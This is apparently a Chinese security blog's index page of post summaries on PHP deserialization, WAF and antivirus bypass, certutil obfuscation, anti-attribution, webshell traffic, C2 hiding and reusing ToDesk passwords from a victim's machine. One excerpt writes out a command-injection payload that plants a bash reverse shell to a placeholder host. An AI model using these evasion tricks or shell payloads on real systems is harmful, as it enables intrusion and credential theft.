摘要: 0x01.前言 本文首发于先知:https://xz.aliyun.com/t/12507。 花些时间把四种常见的php反序列化总结了一遍,各自都找了简单示例和例题,参考了一些师傅的链接加上自己的理解,参考链接放在文末 0x02.反序列化是什么 说到反序列化,经常会想到serialize(),uns 阅读全文
posted @ 2024-03-14 19:21 小新07 阅读(233) 评论(0) 推荐(0)
摘要: 这个系列记录了我学习滴水逆向课程的所有笔记,所以只记录我认为需要总结的知识点,搭配b站滴水逆向三期课程食用更佳。 之前一直学习的是web安全方向,对二进制了解较少,所以笔记不当之处,请各位师傅批评指正,望包容。 阅读全文
posted @ 2024-03-14 10:26 小新07 阅读(691) 评论(0) 推荐(1)
摘要: a、关键词替换 混淆 注释/**/和内联注释/!/的利用 注释和内联注释被拦截,可以在注释和内敛注释里添加其他字符增加混淆效果,结合bp爆破找到可绕过的字符,每处地方可能可绕过的字符串都可能不一样,有些语句/////可以绕过,有些语句不可以,得换成//////,所以这时候需要爆破出此处可绕过的字符串 阅读全文
posted @ 2024-10-25 15:54 小新07 阅读(527) 评论(0) 推荐(0)
摘要: 前言 以下验证绕过效果都使用开源雷池waf 知己知彼百战百胜,想bypass waf还是得先了解waf waf是什么 WAF(WebApplicationFirewall,WEB应用防火墙)会过滤和监测 Web 应用程序与互联网之间的 HTTP/HTTPS 流量,以此来保护 Web 应用程序安全。它 阅读全文
posted @ 2024-10-25 15:39 小新07 阅读(585) 评论(0) 推荐(0)
摘要: sqlserver下利用sqlps.exe白名单绕杀软 前言: 在一次攻防里通过sqlserver盲注拿到一个执行命令权限,但是由于是盲注回显很有问题以及有杀软,所以利用起来非常难受而且拿不到webshell或者上线c2,所以才找到这个方法。 介绍: sqlps.exe是SQL Server附带的一 阅读全文
posted @ 2024-09-07 14:06 小新07 阅读(601) 评论(0) 推荐(0)
摘要: 命令执行绕过 前言:仅提供一些绕过思路,对于较为敏感的命令基本已经失效了 1、多空一格 2、^混淆 certutil -url^cache 3、拷贝文件名 copy C:\Windows\System32\certutil.exe xx.exe 之前绕过火绒添加用户案例 copy c:\window 阅读全文
posted @ 2024-09-07 13:56 小新07 阅读(112) 评论(0) 推荐(0)
摘要: 远程下载上传命令(绕过大小限制) python起http服务 python3 -m http.server 5003 python2 -m SimpleHTTPServer 5003 上传时遇到限制上传大小时: 编码base64:certutil -encode yb.exe 1.txt 可以把1. 阅读全文
posted @ 2024-09-07 13:30 小新07 阅读(89) 评论(0) 推荐(0)
摘要: 防溯源 参考文章:https://mp.weixin.qq.com/s/OXJYBd0bKbauSsi7ia5IDA 基本是在参考文章里摘抄总结出来的个人笔记。 总结: 1、使用识别蜜罐插件 2、指纹浏览器(无痕浏览器)或者独立浏览器,防止JSONP蜜罐溯源 3、挂代理,防止出口ip被溯源 4、尽量 阅读全文
posted @ 2024-09-07 13:06 小新07 阅读(206) 评论(0) 推荐(0)
摘要: 1.蚁剑 蚁剑设置代理后bp抓包,bp看流量方便一点 默认编码器流量分析 进入文件管理器的两个数据包: 解码后的数据为: 7=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};f 阅读全文
posted @ 2024-07-10 15:47 小新07 阅读(220) 评论(0) 推荐(0)
摘要: 反弹不成功排查 今天遇到shell反弹不成功的问题,顺便记下来 0.低权限环境 /tmp写入bash反弹脚本执行 127.0.0.1| Echo ‘bash -i >& /dev/tcp/x.x.x.x/7777 0>&1’>/tmp/1.sh 127.0.0.1|bash /tmp/1.sh ph 阅读全文
posted @ 2024-06-06 18:24 小新07 阅读(170) 评论(0) 推荐(1)
摘要: c2隐藏&流量加密 参考链接 参考文章: https://webxxe.cn/index.php/archives/238/ c2profile随机生成脚本: https://github.com/threatexpress/random_c2_profile https://github.com/ 阅读全文
posted @ 2024-05-21 11:18 小新07 阅读(1067) 评论(0) 推荐(0)
摘要: 翻出todesk的配置文件config.ini 看到clientId就是设备代码,tempAuthPassEx就是临时密码加密后,我们把受害机的tempAuthPassEx复制到本机的todesk配置文件,保存后,重新打开todesk 注意:更新频率得改成手动 重新打开todesk就会发现我们的临时 阅读全文
posted @ 2024-04-21 10:42 小新07 阅读(198) 评论(0) 推荐(0)